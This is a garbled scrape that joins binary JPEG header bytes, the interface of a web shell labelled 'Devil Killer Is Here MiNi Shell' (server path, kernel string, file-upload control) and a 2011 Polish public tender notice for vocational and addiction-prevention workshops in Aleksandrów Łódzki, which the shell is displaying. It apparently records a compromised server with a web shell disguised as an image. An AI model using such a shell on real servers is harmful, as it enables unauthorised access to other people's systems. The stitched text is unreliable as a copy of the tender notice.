JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110405/107459-N-2011.html

<p class="kh_header"><b>Aleksandrów Łódzki: Przeprowadzenie warsztatów w zakresie doradztwa zawodowego, rozwoju osobowości oraz profilaktyki uzależnień dla beneficjentów ostatecznych projektu Nowe Perspektywy</b><br>
<b>Numer ogłoszenia: 107459 - 2011; data zamieszczenia: 05.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Piotrkowska 4/6, 95-070 Aleksandrów Łódzki, woj. łódzkie, tel. 042 7121611, faks 042 7121611.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.aleksandrow-lodzki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie warsztatów w zakresie doradztwa zawodowego, rozwoju osobowości oraz profilaktyki uzależnień dla beneficjentów ostatecznych projektu Nowe Perspektywy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest przeprowadzenie warsztatów w zakresie doradztwa zawodowego, rozwoju osobowości oraz profilaktyki uzależnień dla beneficjentów ostatecznych projektu Nowe Perspektywy.

Przedmiot zamówienia składa się z 8 następujących części:

1. Przeprowadzenie 45 godzin warsztatów w zakresie doradztwa zawodowego dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych w niekorzystnej sytuacji.
     Zakres tematyczny warsztatów: - budowanie celów życiowych, 
                                                         - zasady poszukiwania pracy, 
                                                         - nauka pisania wniosków aplikacyjnych,
                                                         -  inne wynikające  z potrzeb czy diagnozy grupy
    Wykonawca przed rozpoczęciem zajęć jest zobowiązany zapoznać uczestników z ich szczegółowym programem.
    
    Forma realizacji warsztatów:      - 3 grupy x 15 h każda po 16 osób łącznie 45 h.
                                                         - zajęcia w godzinach 16:00-19:15
                                                         - 1 spotkanie trwa 3 godziny plus 15 przerwa na posiłek 
                                                            (zapewniony przez Zamawiającego),
	- zamawiający udostępnia pomieszczenia do realizacji          zajęć, laptop, projektor, ekrany, flipcharty, papier               do flipchartów, kserokopiarkę, internet
Wykonawca zapewnia każdemu uczestnikowi zajęć materiały dydaktyczne oznaczone przekazanymi przez zamawiającego logo projektu, przekazując 1 egz. lub komplet zamawiającemu.
Wykonawca przeprowadza wśród uczestników zajęć ocenę merytoryczną przebiegu zajęć na podstawie przekazanych przez zamawiającego ankiet oceniających; dostarczając je zamawiającemu w ciągu 7 dni od daty zakończenia zajęć.
Wykonawca w ciągu 7 dni od daty zakończenia zajęć z każdą grupą opracowuje opis procesu grupowego i doręcza zamawiającemu.
Wszystkie materiały przygotowane przez Wykonawcę muszą być opatrzone przekazanymi przez zamawiającego logo projektu.
Ilość osób skierowanych na szkolenie może ulec zmianie.
2. Przeprowadzenie 45 godzin warsztatów w zakresie rozwoju osobowości dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych w niekorzystnej sytuacji  
        Zakres tematyczny warsztatów:  - uczucia, złość, stres,
                                                             - inne wynikające z potrzeb czy diagnozy grupy
     Wykonawca przed rozpoczęciem zajęć jest zobowiązany zapoznać uczestników z ich  szczegółowym programem.
       Forma realizacji warsztatów:      - 3 grupy x 15 h każda po 16 osób łącznie 45 h.
                                                           - zajęcia w godzinach 16:00-19:15
                                                           - 1 spotkanie trwa 3 godziny plus 15 przerwa na posiłek 
                                                            (zapewniony przez Zamawiającego),
	- zamawiający udostępnia pomieszczenia do realizacji          zajęć, laptop, projektor, ekrany, flipcharty, papier               do flipchartów, kserokopiarkę, internet

Wykonawca zapewnia każdemu uczestnikowi zajęć materiały dydaktyczne oznaczone przekazanymi przez zamawiającego logo projektu, przekazując 1 egz. lub komplet zamawiającemu.
Wykonawca przeprowadza wśród uczestników zajęć ocenę merytoryczną przebiegu zajęć na podstawie przekazanych przez zamawiającego ankiet oceniających; dostarczając je zamawiającemu w ciągu 7 dni od daty zakończenia zajęć.
Wykonawca w ciągu 7 dni od daty zakończenia zajęć z każdą grupą opracowuje opis procesu grupowego i doręcza zamawiającemu.
Wszystkie materiały przygotowane przez Wykonawcę muszą być opatrzone przekazanymi przez zamawiającego logo projektu.
Ilość osób skierowanych na szkolenie może ulec zmianie.

3. Przeprowadzenie 27 godzin warsztatów w zakresie profilaktyki uzależnień dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, pracujących pozostających w niekorzystnej sytuacji

 Zakres tematyczny warsztatów:  - nowe uzależnienia, 
                                                      - alkoholizm,
                                                      - lekomania,
                                                      - leczenie uzależnień

Wykonawca przed rozpoczęciem zajęć jest zobowiązany zapoznać uczestników z ich  szczegółowym programem.
Forma realizacji warsztatów:      - 3 grupy x 9 h każda po 16 osób łącznie 27 h.
                                                     - zajęcia w godzinach 16:00-19:15
                                                     - 1 spotkanie trwa 3 godziny plus 15 przerwa na posiłek 
                                                          (zapewniony przez Zamawiającego),
                                                      - zamawiający udostępnia pomieszczenia do realizacji          zajęć, laptop, projektor, ekrany, flipcharty, papier               do flipchartów, kserokopiarkę, internet
     
Wykonawca zapewnia każdemu uczestnikowi zajęć materiały dydaktyczne oznaczone przekazanymi przez zamawiającego logo projektu, przekazując 1 egz. lub komplet zamawiającemu.
Wykonawca przeprowadza wśród uczestników zajęć ocenę merytoryczną przebiegu zajęć na podstawie przekazanych przez zamawiającego ankiet oceniających; dostarczając je zamawiającemu w ciągu 7 dni od daty zakończenia zajęć.
Wykonawca w ciągu 7 dni od daty zakończenia zajęć z każdą grupą opracowuje opis procesu grupowego i doręcza zamawiającemu.
Wszystkie materiały przygotowane przez Wykonawcę muszą być opatrzone przekazanymi przez zamawiającego logo projektu.
Ilość osób skierowanych na szkolenie może ulec zmianie.

4. Przeprowadzenie 24 godzin warsztatów w zakresie doradztwa zawodowego dla 12 osób
     bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych dążących do umocnienia pozycji zawodowej.
    Zakres tematyczny warsztatów: - metoda edukacyjna w doradztwie zawodowym   adresowana do osób, które są aktywne w dążeniu do usamodzielnienia i rozwoju życiowego oraz zawodowego ale nadal nie mogą sprecyzować projektu zawodowego, brakuje im orientacji zawodowej zarówno w odniesieniu do swoich możliwości zawodowych, jak też do wymagań i oferty rynku pracy, 
                                                                - etapy procesu decyzyjnego
Wykonawca przed rozpoczęciem zajęć jest zobowiązany zapoznać uczestników z ich  szczegółowym programem.
Forma realizacji warsztatów:       - 1 grupa x 24 h 12 osób,
                                                     - zajęcia w godzinach 15:00-18:15
                                                     - 1 spotkanie trwa 3 godziny plus 15 przerwa na posiłek 
                                                          (zapewniony przez Zamawiającego),
                                                      - zamawiający udostępnia pomieszczenia do realizacji          zajęć, laptop, projektor, ekrany, flipcharty, papier               do flipchartów, kserokopiarkę, internet

Wykonawca zapewnia każdemu uczestnikowi zajęć materiały dydaktyczne oznaczone przekazanymi przez zamawiającego logo projektu, przekazując 1 egz. lub komplet zamawiającemu.
Wykonawca przeprowadza wśród uczestników zajęć ocenę merytoryczną przebiegu zajęć na podstawie przekazanych przez zamawiającego ankiet oceniających; dostarczając je zamawiającemu w ciągu 7 dni od daty zakończenia zajęć.
Wykonawca w ciągu 7 dni od daty zakończenia zajęć z każdą grupą opracowuje opis procesu grupowego i doręcza zamawiającemu.
Wszystkie materiały przygotowane przez Wykonawcę muszą być opatrzone przekazanymi przez zamawiającego logo projektu.
Ilość osób skierowanych na szkolenie może ulec zmianie.

5. Przeprowadzenie 15 godzin warsztatów w zakresie rozwoju osobowości dla 12 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych dążących do umocnienia pozycji zawodowej.
Zakres tematyczny warsztatów: -  trening asertywności adresowany do osób, które są aktywne w dążeniu do usamodzielnienia i rozwoju życiowego oraz zawodowego ale nadal nie mogą sprecyzować projektu zawodowego, brakuje im orientacji zawodowej zarówno w odniesieniu do swoich możliwości zawodowych, jak też do wymagań i oferty rynku pracy, 
                                                       - etapy procesu decyzyjnego

Wykonawca przed rozpoczęciem zajęć jest zobowiązany zapoznać uczestników z ich  szczegółowym programem.
Forma realizacji warsztatów:       - 1 grupa x 15 h 12 osób,
                                                     - zajęcia w godzinach 15:00-18:15
                                                     - 1 spotkanie trwa 3 godziny plus 15 przerwa na posiłek 
                                                          (zapewniony przez Zamawiającego),
                                                      - zamawiający udostępnia pomieszczenia do realizacji          zajęć, laptop, projektor, ekrany, flipcharty, papier               do flipchartów, kserokopiarkę, internet

Wykonawca zapewnia każdemu uczestnikowi zajęć materiały dydaktyczne oznaczone przekazanymi przez zamawiającego logo projektu, przekazując 1 egz. lub komplet zamawiającemu.
Wykonawca przeprowadza wśród uczestników zajęć ocenę merytoryczną przebiegu zajęć na podstawie dostarczonej przez zamawiającego ankiety oceniającej dostarczając je zamawiającemu w ciągu 7 dni od daty zakończenia zajęć.
Wykonawca w ciągu 7 dni od daty zakończenia zajęć z każdą grupą opracowuje opis procesu grupowego i doręcza zamawiającemu.
Wszystkie materiały przygotowane przez Wykonawcę muszą być opatrzone przekazanymi przez zamawiającego logo projektu.
Ilość osób skierowanych na szkolenie może ulec zmianie.

6. Przeprowadzenie 144 h zajęć w zakresie doradztwa zawodowego, opracowanie Indywidualnego Planu Działania (IPD) dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych w niekorzystnej sytuacji .
     Badanie realizuje i IPD opracowuje doradca zawodowy.
     Forma realizacji zajęć:    - 48 osób x 3 h łącznie 144 h.
    Wykonawca w ciągu 7 dni od daty zakończenia pracy z uczestnikami projektu doręczy    Zamawiającemu 48 IPD każdy oznaczony logo projektu.
    Ilość osób skierowanych na szkolenie może ulec zmianie.

7. Przeprowadzenie 144 h zajęć  w zakresie rozwoju osobowości, opracowanie  indywidualnej diagnozy psychologicznej dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych w niekorzystnej sytuacji.
     Badanie realizuje i diagnozy opracowuje psycholog.
     Forma realizacji zajęć:    - 48 osób x 3 h łącznie 144 h.
     Zamawiający udostępni wykonawcy testy KKS, CISS, PKIE, FCZ-KT i pomoce do ich analizy.
     Wykonawca w ciągu 7 dni od daty zakończenia pracy z uczestnikami projektu doręczy zamawiającemu 48 indywidualnych diagnoz psychologicznych, oznaczonych logo projektu.
    Ilość osób skierowanych na szkolenie może ulec zmianie.

8. Przeprowadzenie 20 h warsztatów w zakresie rozwoju osobowości, opracowanie indywidualnej diagnozy psychologicznej dla 10 osób niepełnosprawnych z zaburzeniami psychicznymi zdolnych do podjęcia aktywizacji społecznej, zdrowotnej oraz w ograniczonym stopniu edukacyjnej (niezdolnych do podjęcia aktywizacji zawodowej) oraz 5 osób z najbliższego otoczenia społecznego uczestników.
     Warsztaty z psychiatrycznym terapeutą środowiskowym.
     Wykonawca przed rozpoczęciem zajęć jest zobowiązany zapoznać uczestników z ich    szczegółowym programem.

     Zakres tematyczny warsztatów: - emocje, uczucia, agresja, krzywda, przebaczanie,  asertywność

     Forma realizacji warsztatów:       - 1 grupa x 20 h dla 15 osób tj. 10 uczestników projektu i  5 osób z najbliższego otoczenia społecznego w ramach wsparcia towarzyszącego,
                                                              - 1 spotkanie - 1,5 godziny
                                                              - zajęcia w godzinach 15:05-16:35
                                                              -zamawiający udostępni pomieszczenia do realizacji  zajęć, flipchart, papier do flipchartów, flamastry

Wykonawca zapewni wszystkim uczestnikom materiały dydaktyczne oznaczone logo projektu, jeden komplet wykonawca przekaże zamawiającemu.
Wykonawca przeprowadzi wśród uczestników zajęć ocenę merytoryczną przebiegu zajęć na podstawie przekazanej przez zamawiającego ankiety oceniającej.
Wykonawca w ciągu 7 dni od daty zakończenia pracy z każdą grupą opracuje opis procesu grupowego i doręczy go zamawiającemu; wykonawca oznaczy opis logo projektu.	
Ilość osób skierowanych na szkolenie może ulec zmianie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>powtórzenie tego samego rodzaju usług w zakresie nie przekraczającym 50 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p.- wg. zał nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p.- wg. zał nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p.- wg. zał nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p.- wg. zał nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 u.p.z.p.- wg. zał nr 2 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się zmianę ilości uczestników skierowanych na zajęcia w sytuacji zrekrutowania mmniejszej licznby beneficentów</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aleksandrow-lodzki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Aleksandrowie Łódzkim, ul. Piotrkowska 4/6, kod pocztowy 95-070 Aleksandró Łódzki, Biuro Projektu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.04.2011 godzina 11:00, miejsce: Ośrodek Pomocy Społecznej w Aleksandrowie Łódzkim, ul. Piotrkowska 4/6, kod pocztowy 95-070 Aleksandró Łódzki, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie 45 godzin warsztatów w zakresie doradztwa zawodowego dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych w niekorzystnej sytuacji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie 45 godzin warsztatów w zakresie doradztwa zawodowego dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych w niekorzystnej sytuacji.
     Zakres tematyczny warsztatów: - budowanie celów życiowych, 
                                                         - zasady poszukiwania pracy, 
                                                         - nauka pisania wniosków aplikacyjnych,
                                                         -  inne wynikające  z potrzeb czy diagnozy grupy
    Wykonawca przed rozpoczęciem zajęć jest zobowiązany zapoznać uczestników z ich szczegółowym programem.
    
    Forma realizacji warsztatów:      - 3 grupy x 15 h każda po 16 osób łącznie 45 h.
                                                         - zajęcia w godzinach 16:00-19:15
                                                         - 1 spotkanie trwa 3 godziny plus 15 przerwa na posiłek 
                                                            (zapewniony przez Zamawiającego),
	- zamawiający udostępnia pomieszczenia do realizacji          zajęć, laptop, projektor, ekrany, flipcharty, papier               do flipchartów, kserokopiarkę, internet
Wykonawca zapewnia każdemu uczestnikowi zajęć materiały dydaktyczne oznaczone przekazanymi przez zamawiającego logo projektu, przekazując 1 egz. lub komplet zamawiającemu.
Wykonawca przeprowadza wśród uczestników zajęć ocenę merytoryczną przebiegu zajęć na podstawie przekazanych przez zamawiającego ankiet oceniających; dostarczając je zamawiającemu w ciągu 7 dni od daty zakończenia zajęć.
Wykonawca w ciągu 7 dni od daty zakończenia zajęć z każdą grupą opracowuje opis procesu grupowego i doręcza zamawiającemu.
Wszystkie materiały przygotowane przez Wykonawcę muszą być opatrzone przekazanymi przez zamawiającego logo projektu.
Ilość osób skierowanych na szkolenie może ulec zmianie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie 45 godzin warsztatów w zakresie rozwoju osobowości dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych w niekorzystnej sytuacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie 45 godzin warsztatów w zakresie rozwoju osobowości dla 48 osób bezrobotnych, nieaktywnych zawodowo, niepełnosprawnych zdolnych do podjęcia aktywizacji społecznej i zawodowej, zatrudnionych w niekorzystnej sytuacji  
        Zakres tematyczny warsztatów:  - uczucia, złość, stres,
                                                             - inne wynikające z potrzeb czy diagnozy grupy
     Wykonawca przed rozpoczęciem zajęć jest zobowiązany zapoznać uczestników z ich  szczegółowym programem.
       Forma realizacji warsztatów:      - 3 grupy x 15 h każda po 16 osób łącznie 45 h.
                                                           - zajęcia w godzinach 16:00-19:15
                                                           - 1 spotkanie trwa 3 godziny plus 15 przerwa na posiłek 
                                                            (zapewniony przez Zamawiającego),
	- zamawiający udostępnia pomieszczenia do realizacji          zajęć, laptop, projektor, ekrany, flipcharty, papier               do flipchartów, kserokopiarkę, internet

Wykonawca zapewnia każdemu uczestnikowi zajęć materiały dydaktyczne oznaczone przekazanymi przez zamawiającego logo projektu, przekazując 1 egz. lub komplet zamawiającemu.
Wykonawca przeprowadza wśród uczestników zajęć ocenę merytoryczną przebiegu zajęć na podstawie przekazanych przez zamawiającego ankiet oceniających; dostarczając je zamawiającemu w ciągu 7 dni od daty zakończenia zajęć.
Wykonawca w ciągu 7 dni od daty zakończenia zajęć z każdą grupą opracowuje opis procesu grupowego i doręcza zamawiającemu.
Wszystkie materiały przygotowane przez Wykonawcę muszą być opatrzone przekazanymi przez zamawiającego logo projektu.
Ilość osób skierowanych na szkolenie może ulec zmianie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
